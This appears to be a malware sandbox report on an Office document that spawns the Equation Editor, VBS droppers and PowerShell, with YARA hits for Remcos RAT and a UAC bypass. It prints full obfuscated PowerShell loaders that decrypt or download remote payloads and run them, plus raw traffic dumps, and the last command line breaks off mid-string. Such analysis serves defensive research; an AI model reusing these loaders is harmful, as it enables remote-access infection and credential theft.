QiYIwipRSk/EvwtLcIYJYY0SSULAPSQJ2lYI4c7bZLLDPDBmBgs+MkEOB1MHcvBr607w43fU1UMMFFFsqZmWPLQS9qbwg0Do67pREeuEbe7nByVPQA/srihFIMpJGTjS0xn/pvqGCGNhsyV/TLOfQwOOB/rf1km6vy4bMUxti88Fpr+g9jFTsgd9WakBLkhrvnstsDOrCv6jQREv5JU4cvRmCMUawJRSwZr9rHfLDjJBPoZjB3JgOgay2si0IHV
2024-07-26 11:03:15 UTC	16384	IN	Data Raw: 36 76 34 79 43 2b 48 63 32 32 39 35 61 4e 4a 36 30 38 46 49 72 4a 45 49 6a 2b 30 4c 70 2b 45 61 33 79 37 76 74 69 6a 65 42 2f 39 58 59 71 4a 53 52 48 42 33 36 74 38 6d 69 35 2b 30 77 58 65 33 33 72 59 4a 47 58 61 52 64 57 4c 44 53 4f 2f 49 72 69 61 47 6b 30 56 30 78 50 54 73 72 4d 7a 4c 76 7a 31 43 46 47 31 78 53 32 4e 57 68 31 55 6d 5a 4a 31 70 76 2b 70 62 4b 33 74 59 37 68 62 66 6b 4b 4e 67 6a 79 72 4c 66 30 47 42 54 67 66 36 32 6a 57 43 42 43 4c 4d 54 2b 58 4c 35 69 75 7a 31 7a 45 45 56 39 36 46 54 32 70 50 30 68 67 45 53 67 65 37 4b 51 6d 50 4b 43 4f 62 6b 79 4a 4d 6a 36 48 64 59 37 7a 74 2f 4e 44 38 4f 7a 5a 73 67 38 64 50 4f 54 71 2b 36 34 6e 59 76 68 66 36 33 79 34 58 2b 74 38 75 46 2f 72 66 4c 68 66 36 33 79 34 58 2b 74 38 75 46 2f 72 61 61 38 57 Data Ascii: 6v4yC+Hc2295aNJ608FIrJEIj+0Lp+Ea3y7vtijeB/9XYqJSRHB36t8mi5+0wXe33rYJGXaRdWLDSO/IriaGk0V0xPTsrMzLvz1CFG1xS2NWh1UmZJ1pv+pbK3tY7hbfkKNgjyrLf0GBTgf62jWCBCLMT+XL5iuz1zEEV96FT2pP0hgESge7KQmPKCObkyJMj6HdY7zt/ND8OzZsg8dPOTq+64nYvhf63y4X+t8uF/rfLhf63y4X+t8uF/raa8W
2024-07-26 11:03:15 UTC	16384	IN	Data Raw: 39 35 4e 43 65 51 63 77 74 51 43 73 70 33 4b 54 46 37 42 33 61 37 62 32 57 74 31 2f 6c 6f 6f 4a 46 37 56 65 44 66 4e 78 4b 7a 31 34 44 69 56 45 37 30 62 66 4e 66 70 4a 31 4e 7a 48 6d 34 4a 55 6f 44 42 59 76 2b 35 61 69 58 76 2f 66 4c 73 62 68 67 32 5a 6e 7a 6c 4e 69 39 39 2f 4d 70 75 61 33 4a 59 56 64 6c 63 74 45 31 2f 30 69 51 6d 50 4f 74 59 4c 32 78 4c 46 79 55 4c 42 6a 32 42 39 2f 74 59 4c 30 6e 51 62 53 72 2b 32 35 6f 6d 61 54 6b 66 42 6b 6f 4e 4a 31 30 39 45 52 36 68 6e 76 67 64 54 2b 4a 79 5a 75 44 6c 51 64 6a 6e 77 59 62 31 4b 37 45 36 4c 2b 71 65 71 4f 31 37 7a 55 6e 59 4e 5a 47 6f 58 39 63 38 33 63 71 4a 53 33 79 43 42 65 74 77 75 46 2f 52 54 44 73 65 36 32 69 43 55 41 58 38 4f 48 32 4f 43 6a 67 66 36 32 69 57 52 51 47 64 64 35 4b 2b 4b 6d 6f 4d Data Ascii: 95NCeQcwtQCsp3KTF7B3a7b2Wt1/looJF7VeDfNxKz14DiVE70bfNfpJ1NzHm4JUoDBYv+5aiXv/fLsbhg2ZnzlNi99/Mpua3JYVdlctE1/0iQmPOtYL2xLFyULBj2B9/tYL0nQbSr+25omaTkfBkoNJ109ER6hnvgdT+JyZuDlQdjnwYb1K7E6L+qeqO17zUnYNZGoX9c83cqJS3yCBetwuF/RTDse62iCUAX8OH2OCjgf62iWRQGdd5K+KmoM
2024-07-26 11:03:15 UTC	16384	IN	Data Raw: 59 59 54 31 6d 56 42 6d 53 6e 4a 45 39 61 66 71 33 79 58 69 31 54 4d 65 54 37 64 6e 4d 57 36 4d 30 73 75 52 6b 6f 4b 32 43 51 35 6d 4f 32 53 31 73 32 53 2f 35 43 68 4f 79 35 68 66 4d 61 39 42 42 4a 34 48 2b 74 57 73 61 48 4b 44 41 6d 66 41 6a 7a 61 34 75 55 4f 6d 42 4d 77 78 38 6f 37 69 7a 42 79 59 33 4f 63 47 42 55 34 5a 59 4a 75 79 6b 67 5a 61 55 6b 64 77 5a 2b 72 66 4a 5a 6b 77 56 46 74 52 6c 61 4d 42 65 46 67 4c 58 33 58 38 33 48 69 68 63 39 65 74 53 31 56 2f 57 64 47 56 6f 31 36 2f 43 73 4d 57 72 36 53 76 50 68 66 32 72 78 41 69 67 32 2b 6d 42 55 38 2f 35 38 55 46 6f 77 72 6d 39 6c 6e 57 42 4d 4a 61 4d 2f 5a 53 7a 42 55 6c 76 44 46 57 57 4a 4b 52 55 6d 2b 76 7a 77 34 58 39 49 6f 42 68 4d 4b 54 4a 67 79 76 7a 77 34 58 2b 4c 2b 5a 7a 44 2b 6b 31 6d 66 Data Ascii: YYT1mVBmSnJE9afq3yXi1TMeT7dnMW6M0suRkoK2CQ5mO2S1s2S/5ChOy5hfMa9BBJ4H+tWsaHKDAmfAjza4uUOmBMwx8o7izByY3OcGBU4ZYJuykgZaUkdwZ+rfJZkwVFtRlaMBeFgLX3X83Hihc9etS1V/WdGVo16/CsMWr6SvPhf2rxAig2+mBU8/58UFowrm9lnWBMJaM/ZSzBUlvDFWWJKRUm+vzw4X9IoBhMKTJgyvzw4X+L+ZzD+k1mf

Target ID:	0
Start time:	07:01:58
Start date:	26/07/2024
Path:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Imagebase:	0x13f170000
File size:	28'253'536 bytes
MD5 hash:	D53B85E21886D2AF9815C377537BCAC3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	3
Start time:	07:02:26
Start date:	26/07/2024
Path:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" -Embedding
Imagebase:	0x13f4f0000
File size:	1'423'704 bytes
MD5 hash:	9EE74859D22DAE61F1750B3A1BACB6F5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	10
Start time:	07:02:40
Start date:	26/07/2024
Path:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Wow64 process (32bit):	true
Commandline:	"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Imagebase:	0x400000
File size:	543'304 bytes
MD5 hash:	A87236E214F6D42A65F5DEDAC816AEC8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	07:02:41
Start date:	26/07/2024
Path:	C:\Windows\SysWOW64\wscript.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\createdthingstobefrankwithmeeverywhe.vBS"
Imagebase:	0x510000
File size:	141'824 bytes
MD5 hash:	979D74799EA6C8B8167869A68DF5204A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	07:02:42
Start date:	26/07/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI98685860701936162316809131591218CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnI/cGJmqVj5jCchNUuqniccRhpmR5qMkJqyaxLjAOoZS+I6UjjzBuHKkMUIawH3bTvDj7nWJq1X++W/D0YbGXb8mznv8QaOqQP1S2jB+yDre2mYNc51z88VDp5yhLxv2jub4BAD5MQkn09gj7sFrzKiS0Lv4bbd7SWdBlNNY01HOPdZZi88uLKrHF094fRfKbDTWl6drqxh86PYBPPz5p2Ly9NFsVGPk0kub6u6Kg9MbD3UxusVGZCdUc0aq5EXDqvPaek1WSrhMDfsWP03fZTtbxI2uIb73uc20hNa8tKlWpVgQcg5yXgT1Syt4JsFjugZ9Qtq1uX/OG7aRAuR2SPi44P27EfktJtInMKpDXYHkjZS52YqNTFAu7vkn80WLfrjaKO1puSNI83KG4Gb5VMO0L0qfDKNvusZUr6nwSAndn5NEdU4kRRcVNX137D+ZBob0WbqlGLDBY6a+EMGzYtzcJ9yDU9sRHuvpnJ5c0hkwPy4DW2nC9xKyXClHpMrOAGz59KK909AdcVa3cZMI4okN0iylLC6wphikPk+n/lH8dSrmPfxXmnyxHQ6FPMQ3t7W6XvHMIHBTNK1roZfwexEEon7dKRDC0d2IrLWlyM+aSkJSwieqOUXpMZyJUm2hcsj8O2qQ6SJSSECSO9pH7mC3RTLzx/Yu4I0g+aMXaEbo7jnGZCzrsoXBRasrE5huijlM3SPVHWt7BmPHFNB5UAtl1Poeor3payTIoDvmHLQ5udJKwLQ55FOeaNJf+pmojioT+Punj9PkhiGcH6xTdE+2IrxNPE7ay7Vlrz0F+zzhORfur8P5pHWq383QgBA8DubDwQoW+2/zvvGy0+vtBVpAZBtMhKqsSHtY4fy3hgqLxKhWAneQJQ8WqLkzqUVDY9EPZtjGeMds6via1iXp+weIOrC5nUhoaj4yGoY2MoXMyeOduTv3614RUxvqvvcerqLinXXajm5YyY2gVFXVy7lQs/l3ppDJ/Er9yz3s9rYpNCLl0sEExFChP/0AEE9hA3qtQqm07KfQM7Fm/TxVhAZZQIl8WYJ4sl9VdVuOvk82qKlTC24fpX5MYkZQF4iy2oZu7+PswZNBWNr+R8IbeXGpk6YULjJIQEn49p7IIebLL4A+J83MoPUBcLr/3wfiOdRztCS5fsI1/7gWW61aBZmh9WQ5Y/PN8qrPMJKYzSp84UIHHxGLfpUuclLTYd6067KhaUF+isNYUo0YQamdLvdcnsAnB1fFVG2Z6opzbG7sqFu6AQguz584NTtWuBMlcl43XDc/g09jFmr9jk22MvT+6/1kqeSuax5g4j6g6n3MjeEp9CvY3LOjh+/KWuQr/Kbqc4JIBZhwkTcrNn4Yi2/MmJ/0v3oIfVqNNecpNoQxXyyJjgkG+362VFqQj/+ROnzXepvq3WcWkQ/CheHAW5Iw==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePLACe e4jTMIe4j,[CHar]36)AQMinvOKe-EXpReSsion') -CREplacE 'e4j',[Char]39 -CREplacE([Char]65+[Char]81+[Char]77),[Char]124)\|&( $verbosEPREFerEncE.tosTriNg()[1,3]+'x'-join'')
Imagebase:	0xd50000
File size:	427'008 bytes
MD5 hash:	EB32C070E658937AA9FA9F3AE629B2B8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000C.00000002.454070604.0000000003760000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000C.00000002.454070604.0000000003760000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000C.00000002.454070604.0000000003760000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	07:02:48
Start date:	26/07/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0x140000
File size:	64'704 bytes
MD5 hash:	8FE9545E9F72E460723F484C304314AD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000010.00000002.957434022.0000000000751000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	17
Start time:	07:02:56
Start date:	26/07/2024
Path:	C:\Windows\SysWOW64\wscript.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Forfrelsens.vbs"
Imagebase:	0x90000
File size:	141'824 bytes
MD5 hash:	979D74799EA6C8B8167869A68DF5204A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	07:02:57
Start date:	26/07/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\lyur"
Imagebase:	0x140000
File size:	64'704 bytes
MD5 hash:	8FE9545E9F72E460723F484C304314AD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	07:02:57
Start date:	26/07/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\nazcoqq"
Imagebase:	0x140000
File size:	64'704 bytes
MD5 hash:	8FE9545E9F72E460723F484C304314AD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	07:02:58
Start date:	26/07/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\yueuojavag"
Imagebase:	0x140000
File size:	64'704 bytes
MD5 hash:	8FE9545E9F72E460723F484C304314AD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	07:02:58
Start date:	26/07/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\yueuojavag"
Imagebase:	0x140000
File size:	64'704 bytes
MD5 hash:	8FE9545E9F72E460723F484C304314AD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	07:02:59
Start date:	26/07/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0 Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0';If (${host}.CurrentCulture) {$Digers++;}Function Svndyssendes94($Dukketeatrenes){$Uadskilleligt=$Dukketeatrenes.Length-$Digers;$Mainlining='SUBsTR';$Mainlining+='ing';For( $truthsman=1;$truthsman -lt $Uadskilleligt;$truthsman+=2){$Revisoratets207+=$Dukketeatrenes.$Mainlining.Invoke( $truthsman, $Digers);}$Revisoratets207;}function Scance($Strukturndringernes){ . ($Gederamsen) ($Strukturndringernes);}$Ambages77=Svndyssendes94 ' MIo zGi lKl,aL/C5F. 0R (.W iSn d o,wOs BNQT. R1 0,.v0P; ,W iBnO6 4D;S Uxy6 4M;, ,rSvM:T1 2.1..P0C) SGBeHc k o,/B2 0O1 0 0 1,0B1F IF i.rBeNf,oHxC/E1 2A1 .U0B ';$slotting=Svndyssendes94 '.UTsUe r.-FA g ern,ti ';$Udvandringerne=Svndyssendes94 ' h tTtjpAsA: /E/KaPs,oDc.i aRt i.a t r.aLd,i tGi.i m aArSi a...r o,/GoLs /,t r aDn.s.p o.rbtEm e,nNt...pAfPmM> hSt t pHs,:P/ /,n.e.w ..qCuPr aLnGu s hbaEi qGe r . oerFg..,s a./ wMpc- a.d m.iKnD/ToNs,e rCvDe /Rtdr,a nps.pro.r.tSm.e n tG. pHfTmI ';$Fluffs=Svndyssendes94 'S> ';$Gederamsen=Svndyssendes94 'Pi,e x ';$Lgnere='Unparalysed';$decos = Svndyssendes94 'Ee cMh,oS % a p pTdaaStSa % \FS n i g m yMr,dJe dPeA. SFkSo. ,& &H FeDc h.oU t ';Scance (Svndyssendes94 ',$ g lHo bOaAlC:PRge.gFr =h( c m,d, /Vc, .$ d.e.cBoBs,). ');Scance (Svndyssendes94 'E$SgElFo b.a lR:CS uLj.eFt,=S$SUTdKvFa,n,dIrDiOn.gSeLr,nSe .HsApGlAi tB( $ FJl.uOfNf.sD)p ');Scance (Svndyssendes94 ',[BN e,t .cS eorHvLi.cVe PSo iNn.tSMcaCn,aogAeKr,]S:D:OSPePc uPr.iKt y PDrCoBt o,cFool I=. C[SNNeLt ..S eBcHu rUi.t yMPMrMo.tKo,c o l.TVyGp e ]N:F:VTRl sR1F2E ');$Udvandringerne=$Sujet[0];$Respriser= (Svndyssendes94 ',$.gIl.o bRaBlP: Y m c a = N eIw -.OLb jbeMc t, S.yEsCt,e mH.RNUeStH.mW e.bRCKl i,e.nMt');$Respriser+=$Regr[1];Scance ($Respriser);Scance (Svndyssendes94 'A$ YDm.c,a .UHUeMaPd.e rSsA[ $FsJlIo tRt,i nKgP]d=,$OA,mTbFaSg e,sK7 7 ');$Genlydens=Svndyssendes94 'S$,Y,mTc,a..SD o,w nSl oFa d FSiBl e.(.$FU,d v aSnTd r i nOg.e rSnAeB,f$ PIruoHgAr a m r.eUdHaUk.t r,s )b ';$Programredaktrs=$Regr[0];Scance (Svndyssendes94 ' $ g lTo b a l,: SMaStWeBlSl i tP=,( Tse sAtT-ZPGaDtAh F$DPSr o g rAa mLrAe d,aAk tCrMs ) ');while (!$Satellit) {Scance (Svndyssendes94 'H$Bg lTo,b.a lH: Rie gOi oCn s.p lpaRnvrae t n iBn gBscl i.n.j.e =,$MtCrMuaeu ') ;Scance $Genlydens;Scance (Svndyssendes94 ',S tCa r,t -.Ssl,eOeSp .4N ');Scance (Svndyssendes94 'S$ gSlPoAbLaSlb:AS.a tTeSlNl,iSt =T(,T ecs tF- PSa,t.h, N$FPSr,oSg r a mGrmeGdJa kSt rSs )D ') ;Scance (Svndyssendes94 '.$Lg.l o,bha lD:VfRoSrVl i sAe.= $,g lBoSbAa,lV:FSAmOaGa t r.yEk,kse n eP+E+ %a$gSHu.jieHt .ScKoHu n,tH ') ;$Udvandringerne=$Sujet[$forlise];}$Hjsangs=362888;$Destalinising=27100;Scance (Svndyssendes94 'A$.g l oHb a l :SW h i f.fSe rP B=F G e t -DCFo n t,eFnNtW S$ PrrAo gSrHaSm rPe d aTkIt.rPsT ');Scance (Svndyssendes94 'N$og,l.oFbDaTlT:SFPoCr.l iNs E=H F[ S yRs.tce mS.CCPoAn.v eRr,tT] :,:,F r.o m B,aOs,e 6B4 SPtErFi.nOgD(F$ WVh icf fFehr,)L ');Scance (Svndyssendes94 'T$Bg lOo,bVa l :oHAeTbKeCn oGn =R F[.SBy.sPt e m..TT.e.x.t..VESn c.oGd,i n gD],:.:GA S CNIGI,. G eCt,SAt r.i n gG( $ FPo,r lliIsF) ');Scance (Svndyssendes94 'K$,gYlSoDb,a.lB:ODLe sNq uTa mFa tDiCoAn s = $ H.eLbYeHn oSnB.MsruFbMsPt rLiAnBg.( $.Hlj,s aAnSg sA,T$FD eTs tAaGlUi n ips i nugC)R ');Scance $Desquamations;"
Imagebase:	0x1290000
File size:	427'008 bytes
MD5 hash:	EB32C070E658937AA9FA9F3AE629B2B8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	24
Start time:	07:03:00
Start date:	26/07/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Snigmyrdede.Sko && echo t"
Imagebase:	0x4a590000
File size:	302'592 bytes
MD5 hash:	AD7B9C14083B52BC532FBA5948342B98
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	07:03:18
Start date:	26/07/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0 Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0';If (${host}.CurrentCulture) {$Digers++;}Function Svndyssendes94($Dukketeatrenes){$Uadskilleligt=$Dukketeatrenes.Length-$Digers;$Mainlining='SUBsTR';$Mainlining+='ing';For( $truthsman=1;$truthsman -lt $Uadskilleligt;$truthsman+=2){$Revisoratets207+=$Dukketeatrenes.$Mainlining.Invoke( $truthsman, $Digers);}$Revisoratets207;}function Scance($Strukturndringernes){ . ($Gederamsen) ($Strukturndringernes);}$Ambages77=Svndyssendes94 ' MIo zGi lKl,aL/C5F. 0R (.W iSn d o,wOs BNQT. R1 0,.v0P; ,W iBnO6 4D;S Uxy6 4M;, ,rSvM:T1 2.1..P0C) SGBeHc k o,/B2 0O1 0 0 1,0B1F IF i.rBeNf,oHxC/E1 2A1 .U0B ';$slotting=Svndyssendes94 '.UTsUe r.-FA g ern,ti ';$Udvandringerne=Svndyssendes94 ' h tTtjpAsA: /E/KaPs,oDc.i aRt i.a t r.aLd,i tGi.i m aArSi a...r o,/GoLs /,t r aDn.s.p o.rbtEm e,nNt...pAfPmM> hSt t pHs,:P/ /,n.e.w ..qCuPr aLnGu s hbaEi qGe r . oerFg..,s a./ wMpc- a.d m.iKnD/ToNs,e rCvDe /Rtdr,a nps.pro.r.tSm.e n tG. pHfTmI ';$Fluffs=Svndyssendes94 'S> ';$Gederamsen=Svndyssendes94 'Pi,e x ';$Lgnere='Unparalysed';$decos = Svndyssendes94 'Ee cMh,oS % a p pTdaaStSa % \FS n i g m yMr,dJe dPeA. SFkSo. ,& &H FeDc h.oU t ';Scance (Svndyssendes94 ',$ g lHo bOaAlC:PRge.gFr =h( c m,d, /Vc, .$ d.e.cBoBs,). ');Scance (Svndyssendes94 'E$SgElFo b.a lR:CS uLj.eFt,=S$SUTdKvFa,n,dIrDiOn.gSeLr,nSe .HsApGlAi tB( $ FJl.uOfNf.sD)p ');Scance (Svndyssendes94 ',[BN e,t .cS eorHvLi.cVe PSo iNn.tSMcaCn,aogAeKr,]S:D:OSPePc uPr.iKt y PDrCoBt o,cFool I=. C[SNNeLt ..S eBcHu rUi.t yMPMrMo.tKo,c o l.TVyGp e ]N:F:VTRl sR1F2E ');$Udvandringerne=$Sujet[0];$Respriser= (Svndyssendes94 ',$.gIl.o bRaBlP: Y m c a = N eIw -.OLb jbeMc t, S.yEsCt,e mH.RNUeStH.mW e.bRCKl i,e.nMt');$Respriser+=$Regr[1];Scance ($Respriser);Scance (Svndyssendes94 'A$ YDm.c,a .UHUeMaPd.e rSsA[ $FsJlIo tRt,i nKgP]d=,$OA,mTbFaSg e,sK7 7 ');$Genlydens=Svndyssendes94 'S$,Y,mTc,a..SD o,w nSl oFa d FSiBl e.(.$FU,d v aSnTd r i nOg.e rSnAeB,f$ PIruoHgAr a m r.eUdHaUk.t r,s )b ';$Programredaktrs=$Regr[0];Scance (Svndyssendes94 ' $ g lTo b a l,: SMaStWeBlSl i tP=,( Tse sAtT-ZPGaDtAh F$DPSr o g rAa mLrAe d,aAk tCrMs ) ');while (!$Satellit) {Scance (Svndyssendes94 'H$Bg lTo,b.a lH: Rie gOi oCn s.p lpaRnvrae t n iBn gBscl i.n.j.e =,$MtCrMuaeu ') ;Scance $Genlydens;Scance (Svndyssendes94 ',S tCa r,t -.Ssl,eOeSp .4N ');Scance (Svndyssendes94 'S$ gSlPoAbLaSlb:AS.a tTeSlNl,iSt =T(,T ecs tF- PSa,t.h, N$FPSr,oSg r a mGrmeGdJa kSt rSs )D ') ;Scance (Svndyssendes94 '.$Lg.l o,bha lD:VfRoSrVl i sAe.= $,g lBoSbAa,lV:FSAmOaGa t r.yEk,kse n eP+E+ %a$gSHu.jieHt .ScKoHu n,tH ') ;$Udvandringerne=$Sujet[$forlise];}$Hjsangs=362888;$Destalinising=27100;Scance (Svndyssendes94 'A$.g l oHb a l :SW h i f.fSe rP B=F G e t -DCFo n t,eFnNtW S$ PrrAo gSrHaSm rPe d aTkIt.rPsT ');Scance (Svndyssendes94 'N$og,l.oFbDaTlT:SFPoCr.l iNs E=H F[ S yRs.tce mS.CCPoAn.v eRr,tT] :,:,F r.o m B,aOs,e 6B4 SPtErFi.nOgD(F$ WVh icf fFehr,)L ');Scance (Svndyssendes94 'T$Bg lOo,bVa l :oHAeTbKeCn oGn =R F[.SBy.sPt e m..TT.e.x.t..VESn c.oGd,i n gD],:.:GA S CNIGI,. G eCt,SAt r.i n gG( $ FPo,r lliIsF) ');Scance (Svndyssendes94 